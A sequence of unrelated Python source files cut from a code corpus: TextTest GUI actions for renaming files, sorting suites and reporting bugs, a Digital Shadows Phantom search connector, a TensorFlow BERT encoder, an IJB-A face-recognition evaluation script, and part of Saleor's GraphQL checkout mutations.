len(self.currFileSelection) > 0) and \ self.isActiveOnCurrent() self.setSensitivity(canRename) def isActiveOnCurrent(self, *args): return len(self.currFileSelection) == 1 def singleTestOnly(self): return True def updateOptions(self): self.oldName = os.path.basename(self.currFileSelection[0][0]) associatedObj = self.currFileSelection[0][1] self.configAppList = associatedObj if isinstance(associatedObj, list) else [] self.optionGroup.setOptionValue("name", self.oldName) return True def getSignalsSent(self): return [ "ReloadConfig", "ShortcutRename" ] def _getStockId(self): return "italic" def getActionName(self): return "Rename File" def _getTitle(self): return "_Rename..." def getTooltip(self): return "Rename selected file" def messageAfterPerform(self): pass # Use method below instead. def getNameChangeMessage(self, newName): return "Renamed file " + self.oldName + " to " + newName + "." def checkNewName(self, newName, newPath): if newName == self.oldName: raise plugins.TextTestError, "Please enter a new name." if os.path.exists(newPath): raise plugins.TextTestError, "There is already a file or directory at '" + newName + "', please choose another name." def getConfirmationMessage(self): oldStem = self.oldName.split(".")[0] newName = self.optionGroup.getOptionValue("name") newStem = newName.split(".")[0] if self.isDefinitionFileStem(oldStem) and not self.isDefinitionFileStem(newStem): return "You are trying to rename a definition file in such a way that it will no longer fulfil its previous purpose.\nTextTest uses conventional names for files with certain purposes and '" + oldStem + "' is one such conventional name.\nAre you sure you want to continue?" elif self.oldName.endswith(".shortcut"): if not newName.endswith(".shortcut"): return "A shortcut file name should end with '.shortcut'\nYou are trying to rename it with another extension\nAre you sure you want to continue?" elif self.oldName.count("$") != newName.count("$"): return "The number of shortcut arguments seems to be different.\nAre you sure you want to continue?" else: return "" def isDefinitionFileStem(self, stem): if self.configAppList: return stem == "config" else: return self.currTestSelection[0].isDefinitionFileStem(stem) def performRename(self, newName): oldPath = self.currFileSelection[0][0] newPath = os.path.join(os.path.dirname(oldPath), newName) self.checkNewName(newName, newPath) self.movePath(oldPath, newPath) if self.configAppList: for app in self.configAppList: app.refreshFiles() self.notify("ReloadConfig") else: self.currTestSelection[0].filesChanged() changeMessage = self.getNameChangeMessage(newName) if self.oldName.endswith(".shortcut") and newName.endswith(".shortcut"): from storytext.replayer import ReplayScript self.notify("ShortcutRename", ReplayScript.transformToRegexp(ReplayScript.tryToGetName(self.oldName)) + " renamed to " + ReplayScript.tryToGetName(newName)) self.oldName = newName self.notify("Status", changeMessage) class SortTestSuiteFileAscending(guiplugins.ActionGUI): def singleTestOnly(self): return True def correctTestClass(self): return "test-suite" def isActiveOnCurrent(self, *args): return guiplugins.ActionGUI.isActiveOnCurrent(self, *args) and not self.currTestSelection[0].autoSortOrder def _getStockId(self): return "sort-ascending" def _getTitle(self): return "_Sort Test Suite File" def messageAfterPerform(self): return "Sorted testsuite file for " + self.describeTests() + " in alphabetical order." def getTooltip(self): return "sort testsuite file for the selected test suite in alphabetical order" def performOnCurrent(self): self.performRecursively(self.currTestSelection[0], True) def performRecursively(self, suite, ascending): # First ask all sub-suites to sort themselves if guiutils.guiConfig.getValue("sort_test_suites_recursively"): for test in suite.testcases: if test.classId() == "test-suite": self.performRecursively(test, ascending) self.notify("Status", "Sorting " + repr(suite)) self.notify("ActionProgress") if self.hasNonDefaultTests(): self.showWarningDialog("\nThe test suite\n'" + suite.name + "'\ncontains tests which are not present in the default version.\nTests which are only present in some versions will not be\nmixed with tests in the default version, which might lead to\nthe suite not looking entirely sorted.") suite.sortTests(ascending) def hasNonDefaultTests(self): if len(self.currTestSelection) == 1: return False for extraSuite in self.currTestSelection[1:]: for test in extraSuite.testcases: if not self.currTestSelection[0].findSubtest(test.name): return True return False class SortTestSuiteFileDescending(SortTestSuiteFileAscending): def _getStockId(self): return "sort-descending" def _getTitle(self): return "_Reversed Sort Test Suite File" def messageAfterPerform(self): return "Sorted testsuite file for " + self.describeTests() + " in reversed alphabetical order." def getTooltip(self): return "sort testsuite file for the selected test suite in reversed alphabetical order" def performOnCurrent(self): self.performRecursively(self.currTestSelection[0], False) class ReportBugs(guiplugins.ActionDialogGUI): def __init__(self, allApps, *args): guiplugins.ActionDialogGUI.__init__(self, allApps, *args) self.textGroup = plugins.OptionGroup("Search for") self.searchGroup = plugins.OptionGroup("Search in") self.applyGroup = plugins.OptionGroup("Additional options to only apply to certain runs") self.bugSystemGroup = plugins.OptionGroup("Link failure to a reported bug") self.textDescGroup = plugins.OptionGroup("Link failure to a textual description") self.textGroup.addOption("search_string", "Text or regexp to match", multilineEntry=True) self.textGroup.addSwitch("use_regexp", "Enable regular expressions", 1) self.textGroup.addSwitch("trigger_if", name="Trigger if", options=["Present", "NOT present", "Exactly as given"]) self.searchGroup.addSwitch("data_source", options = [ "Specific file", "Brief text/details", "Full difference report" ], description = [ "Search in a newly generated file (not its diff)", "Search in the brief text describing the test result as it appears in the Details column in the dynamic GUI test view", "Search in the whole difference report as it appears in the lower right window in the dynamic GUI" ]) self.searchGroup.addOption("search_file", "File to search in") self.searchGroup.addSwitch("ignore_other_errors", "Trigger even if other files differ", description="By default, this bug is only enabled if only the provided file is different. Check this box to enable it irrespective of what other difference exist. Note this increases the chances of it being reported erroneously and should be used carefully.") self.searchGroup.addSwitch("trigger_on_success", "Trigger even if file to search would otherwise compare as equal", description="By default, this bug is only enabled if a difference is detected in the provided file to search. Check this box to search for it even if the file compares as equal.") self.applyGroup.addOption("version", "\nVersion to report for") self.applyGroup.addOption("execution_hosts", "Trigger only when run on machine(s)") self.bugSystemGroup.addOption("bug_system", "\nExtract info from bug system", "<none>", self.findBugSystems(allApps)) self.bugSystemGroup.addOption("bug_id", "Bug ID") self.textDescGroup.addOption("full_description", "\nFull description") self.textDescGroup.addOption("brief_description", "Few-word summary") self.textDescGroup.addSwitch("internal_error", "Report as 'internal error' rather than 'known bug'") self.optionGroup.addOption("rerun_count", "Number of times to try to rerun the test if the issue is triggered", 0) def isModal(self): return False # Want to be able to select text from the main GUI while we're in the dialog def fillVBox(self, vbox, optionGroup): if optionGroup is self.optionGroup: for group in [ self.textGroup, self.searchGroup, self.applyGroup ]: if group is self.applyGroup: widget = self.createExpander(group) else: widget = self.createFrame(group, group.name) vbox.pack_start(widget, fill=False, expand=False, padding=8) vbox.pack_start(gtk.HSeparator(), padding=8) header = gtk.Label() header.set_markup("<u>Fill in exactly <i>one</i> of the sections below</u>\n") vbox.pack_start(header, expand=False, fill=False, padding=8) for group in [ self.bugSystemGroup, self.textDescGroup ]: frame = self.createFrame(group, group.name) vbox.pack_start(frame, fill=False, expand=False, padding=8) return guiplugins.ActionDialogGUI.fillVBox(self, vbox, optionGroup) def createExpander(self, group): expander = gtk.Expander(group.name) expander.add(self.createGroupBox(group)) return expander def createRadioButtons(self, *args): buttons = guiplugins.ActionDialogGUI.createRadioButtons(self, *args) buttons[0].connect("toggled", self.dataSourceChanged) return buttons def dataSourceChanged(self, *args): sensitive = not self.searchGroup.getOptionValue("data_source") self.setGroupSensitivity(self.searchGroup, sensitive) def findBugSystems(self, allApps): bugSystems = [] for app in allApps: for appSystem in app.getConfigValue("bug_system_location").keys(): if appSystem not in bugSystems: bugSystems.append(appSystem) return bugSystems def _getStockId(self): return "info" def _getTitle(self): return "Enter Failure Information" def getDialogTitle(self): return "Enter information for automatic interpretation of test failures" def getDefaultSearchFile(self, possibleValues): logFileStems = set([ test.getConfigValue("log_file") for test in self.currTestSelection ]) for logFileStem in logFileStems: if logFileStem in possibleValues: return logFileStem return possibleValues[0] def _cleanDialog(self, *args): self.searchGroup.getOption("search_file").resetDefault() guiplugins.ActionDialogGUI._cleanDialog(self, *args) def updateOptions(self): possibleValues = self.getPossibleFileStems() if possibleValues: self.searchGroup.setOptionValue("search_file", self.getDefaultSearchFile(possibleValues)) self.searchGroup.setPossibleValues("search_file", possibleValues) return False def getPossibleFileStems(self): stems = [] for testOrSuite in self.currTestSelection: excludeStems = testOrSuite.expandedDefFileStems() for test in testOrSuite.testCaseList(): for stem in test.dircache.findAllStems(): if stem not in stems and stem not in excludeStems: stems.append(stem) return stems def checkSanity(self): searchStr = self.textGroup.getOptionValue("search_string") if len(searchStr) == 0: raise plugins.TextTestError, "Must fill in the field 'text or regexp to match'" elif searchStr.startswith(" "): raise plugins.TextTestError, "'Knownbugs' file format cannot handle leading spaces in search string.\n" + \ "If the line starts with spaces, suggest to add a ^ at the start, to match the beginning of the line" if self.bugSystemGroup.getOptionValue("bug_system") == "<none>": if len(self.textDescGroup.getOptionValue("full_description")) == 0 or \ len(self.textDescGroup.getOptionValue("brief_description")) == 0: raise plugins.TextTestError, "Must either provide a bug system or fill in both description and summary fields" else: if len(self.bugSystemGroup.getOptionValue("bug_id")) == 0: raise plugins.TextTestError, "Must provide a bug ID if bug system is given" def versionSuffix(self): version = self.applyGroup.getOptionValue("version") if len(version) == 0: return "" else: return "." + version def getFiles(self, ancestors): fileNames = [] for ancestor in ancestors: name = "knownbugs." + ancestor.app.name + self.versionSuffix() fileName = os.path.join(ancestor.getDirectory(), name) if not any((fileName.startswith(f) for f in fileNames)): fileNames.append(fileName) return [ open(fileName, "a") for fileName in fileNames ] def getSizeAsWindowFraction(self): # size of the dialog return 0.6, 0.6 @classmethod def updateAncestors(cls, ancestors, test): for i, ancestor in enumerate(ancestors): newAncestor = ancestor.findCommonAncestor(test) if newAncestor: ancestors[i] = newAncestor return True return False @classmethod def findCommonSelectedAncestors(cls, tests): ancestors = [ tests[0] ] for test in tests[1:]: if not cls.updateAncestors(ancestors, test): ancestors.append(test) return ancestors def performOnCurrent(self): self.checkSanity() dataSourceText = { 1 : "brief_text", 2 : "free_text" } triggerText = {1 : "trigger_on_absence", 2 : "trigger_on_identical"} namesToIgnore = [ "version" ] ancestors = self.findCommonSelectedAncestors(self.currTestSelection) for writeFile in self.getFiles(ancestors): writeFile.write("\n[Reported by " + os.getenv("USER", "Windows") + " at " + plugins.localtime() + "]\n") for group in [ self.textGroup, self.searchGroup, self.applyGroup, self.bugSystemGroup, self.textDescGroup, self.optionGroup ]: for name, option in group.options.items(): value = option.getValue() if name in namesToIgnore or self.hasDefaultValue(name, value): continue if name == "data_source": writeFile.write("search_file:" + dataSourceText[value] + "\n") namesToIgnore += [ "search_file", "trigger_on_success", "ignore_other_errors" ] elif name == "trigger_if": writeFile.write(triggerText[value] + ":" + "1\n") else: writeFile.write(name + ":" + str(value).replace("\n", "\\n") + "\n") self.updateWithBugFile(writeFile, ancestors) writeFile.close() self.setFilesChanged(ancestors) def hasDefaultValue(self, name, value): if name == "use_regexp": return value == 1 else: return not value or value in [ "0", "<none>" ] def updateWithBugFile(self, *args): pass # only used in dynamic GUI def setFilesChanged(self, ancestors): for ancestor in ancestors: ancestor.filesChanged() def getInteractiveActionClasses(): return [ CopyTests, CutTests, PasteTests, ImportTestCase, ImportTestSuite, ImportApplication, ImportFiles, RenameTest, RenameFile, RemoveTests, RemoveTestsForPopup, RemoveFiles, ReportBugs, SortTestSuiteFileAscending, SortTestSuiteFileDescending, RepositionTestFirst, RepositionTestUp, RepositionTestDown, RepositionTestLast ]
# File: ds_search_entities_connector.py # # Licensed under Apache 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt) # import phantom.app as phantom from phantom.action_result import ActionResult from digital_shadows_consts import * from dsapi.service.search_entities_service import SearchEntitiesService from exception_handling_functions import ExceptionHandling class DSSearchEntitiesConnector(object): def __init__(self, connector): """ :param connector: DigitalShadowsConnector """ self._connector = connector config = connector.get_config() self._handle_exception_object = ExceptionHandling() self._ds_api_key = config[DS_API_KEY_CFG] self._ds_api_secret_key = config[DS_API_SECRET_KEY_CFG] def search_entities(self, param): action_result = ActionResult(dict(param)) self._connector.add_action_result(action_result) self._connector.save_progress("process started...!!! ") # type = param.get('types').split(',') type = ["CLIENT_INCIDENT", "DATA_BREACH", "AGGREGATE_DATA_BREACH", "INTELLIGENCE", "TECHNICAL_SOURCE", "WEB_SOURCE"] date_range = param.get('date_range') query = param.get('query') """ incident_types = param.get('incident_types') incident_subtypes = param.get('incident_subtypes') incident_severities = param.get('incident_severities') web_page_networks = param.get('web_page_networks') forum_post_networks = param.get('forum_post_networks') marketplace_listing_networks = param.get('marketplace_listing_networks') market_places = param.get('marketplaces') chat_protocols = param.get('chat_protocols') chat_servers = param.get('chat_servers') chat_channels = param.get('chat_channels') threat_level_types = param.get('threat_level_types') web_page_site_categories = param.get('web_page_site_categories') forum_post_site_categories = param.get('forum_post_site_categories') blog_names = param.get('blog_names') date_period = param.get('date_period') start_date = param.get('from') end_date = param.get('until') """ try: search_service = SearchEntitiesService(self._ds_api_key, self._ds_api_secret_key) except Exception as e: error_message = self._handle_exception_object.get_error_message_from_exception(e) return action_result.set_status(phantom.APP_ERROR, "{0} {1}".format(SERVICE_ERR_MSG, error_message)) try: search_view = search_service.search_entity_view(dateRange=date_range, query_string=query, types=type) except Exception as e: error_message = self._handle_exception_object.get_error_message_from_exception(e) return action_result.set_status(phantom.APP_ERROR, "Error Connecting to server. {0}".format(error_message)) """ search_view = search_service.search_entity_view(types=type, dateRange=date_range, incidentTypes=incident_types, incidentSubtypes=incident_subtypes, incidentSeverities=incident_severities, webPageNetworks=web_page_networks, forumPostNetworks=forum_post_networks, marketplaceListingNetworks=marketplace_listing_networks, marketplaces=market_places, chatProtocols=chat_protocols, chatServers=chat_servers, chatChannels=chat_channels, threatLevelTypes=threat_level_types, webPageSiteCategories=web_page_site_categories, forumPostSiteCategories=forum_post_site_categories, blogNames=blog_names, datePeriod=date_period, from_date=start_date, until=end_date, query_string=query) """ self._connector.save_progress("View: {}".format(search_view)) try: search_entity_pages = search_service.find_all_pages(view=search_view) # self._connector.save_progress("entity: " + str(search_entity_pages)) entity_total = len(search_entity_pages) except StopIteration: error_message = 'No Search Entity objects retrieved from the Digital Shadows API in page groups' return action_result.set_status(phantom.APP_ERROR, "Error Details: {0}".format(error_message)) except Exception as e: error_message = self._handle_exception_object.get_error_message_from_exception(e) return action_result.set_status(phantom.APP_ERROR, "Error Connecting to server. {}".format(error_message)) if entity_total > 0: summary = { 'entity_count': entity_total, 'entity_found': True } action_result.update_summary(summary) for entity_page in search_entity_pages: for entity in entity_page: # self._connector.save_progress("entity payload: " + str(entity.payload)) action_result.add_data(entity.payload) action_result.set_status(phantom.APP_SUCCESS, 'String search entities are fetched') else: summary = { 'entity_count': 0, 'entity_found': False } action_result.update_summary(summary) action_result.set_status(phantom.APP_SUCCESS, 'Entities not found for search string') return action_result.get_status()
# coding: utf-8 from __future__ import absolute_import from __future__ import division from __future__ import print_function import tensorflow as tf import tensorflow.contrib as tc from . import encoder from utils import util def bert_encoder(sequence, params): # extract sequence mask information seq_mask = 1. - tf.to_float(tf.equal(sequence, params.bert.vocab.pad)) # extract segment information seg_pos = tf.to_float(tf.equal(sequence, params.bert.vocab.sep)) seg_ids = tf.cumsum(seg_pos, axis=1, reverse=True) seg_num = tf.reduce_sum(seg_pos, axis=1, keepdims=True) seg_ids = seg_num - seg_ids seg_ids = tf.to_int32(seg_ids * seq_mask) # sequence length information seq_shp = util.shape_list(sequence) batch_size, seq_length = seq_shp[:2] def custom_getter(getter, name, *args, **kwargs): kwargs['trainable'] = params.tune_bert return getter(name, *args, **kwargs) with tf.variable_scope("bert", custom_getter=custom_getter): # handling sequence embeddings: token_embedding pls segment embedding pls positional embedding embed_initializer = tf.truncated_normal_initializer(stddev=params.bert.initializer_range) with tf.variable_scope("embeddings"): word_embedding = tf.get_variable( name="word_embeddings", shape=[params.bert.vocab.size, params.bert.hidden_size], initializer=embed_initializer ) seq_embed = tf.nn.embedding_lookup(word_embedding, sequence) segment_embedding = tf.get_variable( name="token_type_embeddings", shape=[2, params.bert.hidden_size], initializer=embed_initializer ) seg_embed = tf.nn.embedding_lookup(segment_embedding, seg_ids) # word embedding + segment embedding seq_embed = seq_embed + seg_embed # add position embedding assert_op = tf.assert_less_equal(seq_length, params.bert.max_position_embeddings) with tf.control_dependencies([assert_op]): position_embedding = tf.get_variable( name="position_embeddings", shape=[params.bert.max_position_embeddings, params.bert.hidden_size], initializer=embed_initializer ) pos_embed = position_embedding[:seq_length] seq_embed = seq_embed + tf.expand_dims(pos_embed, 0) # post-processing, layer norm and segmentation seq_embed = tc.layers.layer_norm( inputs=seq_embed, begin_norm_axis=-1, begin_params_axis=-1) seq_embed = util.valid_apply_dropout(seq_embed, params.bert.hidden_dropout_prob) bert_outputs = [] # handling sequence encoding with transformer encoder with tf.variable_scope("encoder"): attention_mask = encoder.create_attention_mask_from_input_mask( sequence, seq_mask) # Run the stacked transformer. # `sequence_output` shape = [batch_size, seq_length, hidden_size]. all_encoder_layers = encoder.transformer_model( input_tensor=seq_embed, attention_mask=attention_mask, hidden_size=params.bert.hidden_size, num_hidden_layers=params.bert.num_hidden_layers, num_attention_heads=params.bert.num_attention_heads, intermediate_size=params.bert.intermediate_size, intermediate_act_fn=encoder.get_activation(params.bert.hidden_act), hidden_dropout_prob=params.bert.hidden_dropout_prob, attention_probs_dropout_prob=params.bert.attention_probs_dropout_prob, initializer_range=params.bert.initializer_range, do_return_all_layers=True) sequence_output = all_encoder_layers bert_outputs.append(sequence_output) if params.use_bert_single: # The "pooler" converts the encoded sequence tensor of shape # [batch_size, seq_length, hidden_size] to a tensor of shape # [batch_size, hidden_size]. This is necessary for segment-level # (or segment-pair-level) classification tasks where we need a fixed # dimensional representation of the segment. with tf.variable_scope("pooler"): # We "pool" the model by simply taking the hidden state corresponding # to the first token. We assume that this has been pre-trained first_token_tensor = tf.squeeze(sequence_output[-1][:, 0:1, :], axis=1) pooled_output = tf.layers.dense( first_token_tensor, params.bert.hidden_size, activation=tf.tanh, kernel_initializer=embed_initializer) bert_outputs.append(pooled_output) return bert_outputs def bert_feature(layer_features, scope=None): with tf.variable_scope(scope or "fuse_bert_seq_feature"): layer_features = [tf.expand_dims(feature, 0) for feature in layer_features] layer_features = tf.concat(layer_features, 0) layer_logits = tf.layers.dense(layer_features, 1) layer_weights = tf.nn.softmax(layer_logits, 0) layer_feature = tf.reduce_sum(layer_weights * layer_features, 0) return layer_feature
import os, sys, shutil import struct as st import numpy as np from scipy import spatial from sklearn import metrics from scipy.optimize import fsolve from scipy.interpolate import interp1d from sklearn.metrics.pairwise import cosine_similarity def load_meta_data(meta_file, sub_dir): meta_data = dict() with open(meta_file, 'r') as in_f: in_f.readline() # the first line is not data for idx, line in enumerate(in_f): record = line.strip().split(',') template, class_id = int(record[0]), int(record[1]) img_path = '{}/{}.jpg'.format(sub_dir,idx+1) if template not in meta_data: meta_data[template] = ( class_id, [img_path,] ) else: meta_data[template][1].append(img_path) return meta_data def load_feat(list_file, bin_file): mid_feats = dict() with open(list_file, 'r') as list_f, open(bin_file, 'rb') as bin_f: (data_num, feat_dim) = st.unpack('ii', bin_f.read(8)) for line in list_f: record = line.strip().split('/') img_name = '/'.join(record[-2:]) feat = np.array(st.unpack('f'*feat_dim, bin_f.read(4*feat_dim))) mid_feats[img_name] = feat return mid_feats, feat_dim def update_meta_data(meta_data, feats, feat_dim): new_meta_data = dict() for template in meta_data.keys(): class_id, img_names = meta_data[template] feat = np.zeros(feat_dim) feat_num = 0 for img_name in img_names: if img_name in feats: feat += feats[img_name] feat_num += 1 #else: #print(img_name) if feat_num > 0: feat /= feat_num if feat_num > 0: new_meta_data[template] = (class_id, feat) return new_meta_data def get_top(probe, gallery_data): score_info = list() probe_id, probe_feat = probe for template in gallery_data.keys(): gallery_id, gallery_feat = gallery_data[template] score = 1-spatial.distance.cosine(probe_feat, gallery_feat) score_info.append((gallery_id, score)) score_info = sorted(score_info, key=lambda a:a[1], reverse=True) top5_id = [item[0] for item in score_info[:5]] return top5_id def eval_recog(probe_data, gallery_data): gallery_ids = set() for template in gallery_data.keys(): gallery_ids.add(gallery_data[template][0]) top1_num, top5_num, tot_num = 0, 0, 0 for template in probe_data.keys(): class_id = probe_data[template][0] if class_id not in gallery_ids: continue top5_id = get_top(probe_data[template], gallery_data) if class_id==top5_id[0]: top1_num += 1 top5_num += 1 elif class_id in top5_id: top5_num += 1 tot_num += 1 return top1_num/tot_num, top5_num/tot_num def test_recog(model_type): #model_type = 'resnet18' protocol_dir = '../../data/IJBA/protocol_1N' align_img_dir = '../../data/IJBA/align_image_1N' split_num = 10 top1s, top5s = list(), list() for split in range(1, split_num+1): # load meta data first split_protocol_dir = os.path.join(protocol_dir, 'split{}'.format(split)) #split_img_dir = os.path.join(align_img_dir, 'split{}'.format(split)) probe_file = os.path.join(split_protocol_dir, 'search_probe_{}.csv'.format(split)) probe_data = load_meta_data(probe_file, 'probe') gallery_file = os.path.join(split_protocol_dir, 'search_gallery_{}.csv'.format(split)) gallery_data = load_meta_data(gallery_file, 'gallery') # load extract feat feats = dict() feat_dim = 0 split_img_dir = os.path.join(align_img_dir, 'split{}'.format(split)) for img_type in ['gallery', 'probe']: list_file = os.path.join(split_img_dir, '{}_list.txt'.format(img_type)) bin_file = os.path.join(split_img_dir, '{}_{}_feat.bin'.format(model_type, img_type)) mid_feats, feat_dim = load_feat(list_file, bin_file) feats.update(mid_feats) # update meta data probe_data = update_meta_data(probe_data, feats, feat_dim) gallery_data = update_meta_data(gallery_data, feats, feat_dim) top1, top5 = eval_recog(probe_data, gallery_data) top1s.append(top1) top5s.append(top5) print('split {}, top1: {}, top5: {}'.format(split,top1,top5)) print('top1: {} +/- {}'.format(np.mean(top1s), np.std(top1s))) print('top5: {} +/- {}'.format(np.mean(top5s), np.std(top5s))) return np.mean(top1s), np.std(top1s), np.mean(top5s), np.std(top5s) if __name__ == '__main__': test_recog(model_type='resnet50')
import graphene from django.db import transaction from ...checkout import models from ...checkout.utils import ( add_variant_to_cart, change_billing_address_in_cart, change_shipping_address_in_cart, create_order, get_taxes_for_cart, ready_to_place_order) from ...core import analytics from ...core.exceptions import InsufficientStock from ...core.utils.taxes import get_taxes_for_address from ...payment import PaymentError from ...payment.utils import gateway_authorize, gateway_capture, gateway_void from ...shipping.models import ShippingMethod as ShippingMethodModel from ..account.i18n import I18nMixin from ..account.types import AddressInput, User from ..core.mutations import BaseMutation, ModelMutation from ..core.types.common import Error from ..order.types import Order from ..product.types import ProductVariant from ..shipping.types import ShippingMethod from .types import Checkout, CheckoutLine def clean_shipping_method( checkout, method, errors, discounts, taxes, country_code=None, remove=True): # FIXME Add tests for this function if not method: return errors if not checkout.is_shipping_required(): errors.append( Error( field='checkout', message='This checkout does not requires shipping.')) if not checkout.shipping_address: errors.append( Error( field='checkout', message=( 'Cannot choose a shipping method for a ' 'checkout without the shipping address.'))) return errors valid_methods = ( ShippingMethodModel.objects.applicable_shipping_methods( price=checkout.get_subtotal(discounts, taxes).gross.amount, weight=checkout.get_total_weight(), country_code=country_code or checkout.shipping_address.country.code )) valid_methods = valid_methods.values_list('id', flat=True) if method.pk not in valid_methods and not remove: errors.append( Error( field='shippingMethod', message='Shipping method cannot be used with this checkout.')) if remove: checkout.shipping_method = None checkout.save(update_fields=['shipping_method']) return errors def check_lines_quantity(variants, quantities): """Check if stock is sufficient for each line in the list of dicts. Return list of errors. """ errors = [] for variant, quantity in zip(variants, quantities): try: variant.check_quantity(quantity) except InsufficientStock as e: message = ( 'Could not add item ' + '%(item_name)s. Only %(remaining)d remaining in stock.' % { 'remaining': e.item.quantity_available, 'item_name': e.item.display_product()}) errors.append(('quantity', message)) return errors class CheckoutLineInput(graphene.InputObjectType): quantity = graphene.Int( description='The number of items purchased.') variant_id = graphene.ID(description='ID of the ProductVariant.') class CheckoutCreateInput(graphene.InputObjectType): lines = graphene.List( CheckoutLineInput, description=( 'A list of checkout lines, each containing information about ' 'an item in the checkout.')) email = graphene.String(description='The customer\'s email address.') shipping_address = AddressInput( description=( 'The mailling address to where the checkout will be shipped.')) class CheckoutCreate(ModelMutation, I18nMixin): class Arguments: input = CheckoutCreateInput( required=True, description='Fields required to create a Checkout.') class Meta: description = 'Create a new Checkout.' model = models.Cart return_field_name = 'checkout' @classmethod def clean_input(cls, info, instance, input, errors): cleaned_input = super().clean_input(info, instance, input, errors) lines = input.pop('lines', None) if lines: variant_ids = [line.get('variant_id') for line in lines] variants = cls.get_nodes_or_error( ids=variant_ids, errors=errors, field='variant_id', only_type=ProductVariant) quantities = [line.get('quantity') for line in lines] line_errors = check_lines_quantity(variants, quantities) if line_errors: for err in line_errors: cls.add_error(errors, field=err[0], message=err[1]) else: cleaned_input['variants'] = variants cleaned_input['quantities'] = quantities shipping_address_data = input.pop('shipping_address', None) if shipping_address_data: shipping_address, errors = cls.validate_address( shipping_address_data, errors) cleaned_input['shipping_address'] = shipping_address return cleaned_input @classmethod def save(cls, info, instance, cleaned_input): shipping_address = cleaned_input.get('shipping_address') if shipping_address: shipping_address.save() instance.shipping_address = shipping_address super().save(info, instance, cleaned_input) instance.save(update_fields=['shipping_address']) variants = cleaned_input.get('variants') quantities = cleaned_input.get('quantities') if variants and quantities: for variant, quantity in zip(variants, quantities): add_variant_to_cart(instance, variant, quantity) class CheckoutLinesAdd(BaseMutation): checkout = graphene.Field(Checkout, description='An updated Checkout.') class Arguments: checkout_id = graphene.ID( description='The ID of the Checkout.', required=True) lines = graphene.List( CheckoutLineInput, required=True, description=( 'A list of checkout lines, each containing information about ' 'an item in the checkout.')) class Meta: description = 'Adds a checkout line to the existing checkout.' @classmethod def mutate(cls, root, info, checkout_id, lines, replace=False): errors = [] checkout = cls.get_node_or_error( info, checkout_id, errors, 'checkout_id', only_type=Checkout) variants, quantities = None, None if checkout is not None: if lines: variant_ids = [line.get('variant_id') for line in lines] variants = cls.get_nodes_or_error( ids=variant_ids, errors=errors, field='variant_id', only_type=ProductVariant) quantities = [line.get('quantity') for line in lines] line_errors = check_lines_quantity(variants, quantities) if line_errors: for err in line_errors: cls.add_error(errors, field=err[0], message=err[1]) # FIXME test if below function is called clean_shipping_method( checkout=checkout, method=checkout.shipping_method, errors=errors, discounts=info.context.discounts, taxes=get_taxes_for_address(checkout.shipping_address)) if errors: return CheckoutLinesAdd(errors=errors) if variants and quantities: for variant, quantity in zip(variants, quantities): add_variant_to_cart( checkout, variant, quantity, replace=replace) return CheckoutLinesAdd(checkout=checkout, errors=errors) class CheckoutLinesUpdate(CheckoutLinesAdd): checkout = graphene.Field(Checkout, description='An updated Checkout.') class Meta: description = 'Updates CheckoutLine in the existing Checkout.' @classmethod def mutate(cls, root, info, checkout_id, lines): return super().mutate(root, info, checkout_id, lines, replace=True) class CheckoutLineDelete(BaseMutation): checkout = graphene.Field(Checkout, description='An updated checkout.') class Arguments: checkout_id = graphene.ID( description='The ID of the Checkout.', required=True) line_id = graphene.ID( description='ID of the CheckoutLine to delete.') class Meta: description = 'Deletes a CheckoutLine.' @classmethod def mutate(cls, root, info, checkout_id, line_id): errors = [] checkout = cls.get_node_or_error( info, checkout_id, errors, 'checkout_id', only_type=Checkout) line = cls.get_node_or_error( info, line_id, errors, 'line_id', only_type=CheckoutLine) if line and line in checkout.lines.all(): line.delete() # FIXME test if below function is called clean_shipping_method( checkout=checkout, method=checkout.shipping_method, errors=errors, discounts=info.context.discounts, taxes=get_taxes_for_address(checkout.shipping_address)) if errors: return CheckoutLineDelete(errors=errors) return CheckoutLineDelete(checkout=checkout, errors=errors) class CheckoutCustomerAttach(BaseMutation): checkout = graphene.Field(Checkout, description='An updated checkout.') class Arguments: checkout_id = graphene.ID( required=True, description='ID of the Checkout.') customer_id = graphene.ID( required=True, description='The ID of the customer.') class Meta: description = 'Sets the customer as the owner of the Checkout.' @classmethod def mutate(cls, root, info, checkout_id, customer_id): errors = [] checkout = cls.get_node_or_error( info, checkout_id, errors, 'checkout_id', only_type=Checkout) customer = cls.get_node_or_error( info, customer_id, errors, 'customer_id', only_type=User) if checkout is not None and customer: checkout.user = customer checkout.save(update_fields=['user']) return CheckoutCustomerAttach(checkout=checkout, errors=errors) class CheckoutCustomerDetach(BaseMutation): checkout = graphene.Field(Checkout, description='An updated checkout') class Arguments: checkout_id = graphene.ID(description='Checkout ID', required=True) class Meta: description = 'Removes the user assigned as the owner of the checkout.' @classmethod def mutate(cls, root, info, checkout_id): errors = [] checkout = cls.get_node_or_error( info, checkout_id, errors, 'checkout_id', only_type=Checkout) if checkout is not None and not checkout.user: cls.add_error( errors, field=None, message='There\'s no customer assigned to this Checkout.') if errors: return CheckoutCustomerDetach(errors=errors) checkout.user = None checkout.save(update_fields=['user']) return CheckoutCustomerDetach(checkout=checkout) class CheckoutShippingAddressUpdate(BaseMutation, I18nMixin): checkout = graphene.Field(Checkout, description='An updated checkout') class Arguments: checkout_id = graphene.ID(description='ID of the Checkout.') shipping_address = AddressInput( description=( 'The mailling address to where the checkout will be shipped.')) class Meta: description = 'Update shipping address in the existing Checkout.' @classmethod def mutate(cls, root, info, checkout_id, shipping_address): errors = [] checkout = cls.get_node_or_error( info, checkout_id, errors, 'checkout_id', only_type=Checkout) if checkout is not None: shipping_address, errors = cls.validate_address( shipping_address, errors, instance=checkout.shipping_address) clean_shipping_method( checkout, checkout.shipping_method, errors, info.context.discounts, get_taxes_for_address(shipping_address)) if errors: CheckoutShippingAddressUpdate(errors=errors) if shipping_address: with transaction.atomic(): shipping_address.save() change_shipping_address_in_cart(checkout, shipping_address) return CheckoutShippingAddressUpdate(checkout=checkout, errors=errors) class CheckoutBillingAddressUpdate(CheckoutShippingAddressUpdate): checkout = graphene.Field(Checkout, description='An updated checkout') class Arguments: checkout_id = graphene.ID(description='ID of the Checkout.') billing_address = AddressInput( description=( 'The billing address of the checkout.')) class Meta: description = 'Update billing address in the existing Checkout.' @classmethod def mutate(cls, root, info, checkout_id, billing_address): errors = [] checkout = cls.get_node_or_error( info, checkout_id, errors, 'checkout_id', only_type=Checkout) if billing_address: billing_address, errors = cls.validate_address( billing_address, errors, instance=checkout.billing_address) if errors: return CheckoutBillingAddressUpdate(errors=errors) if checkout is not None and billing_address: with transaction.atomic(): billing_address.save() 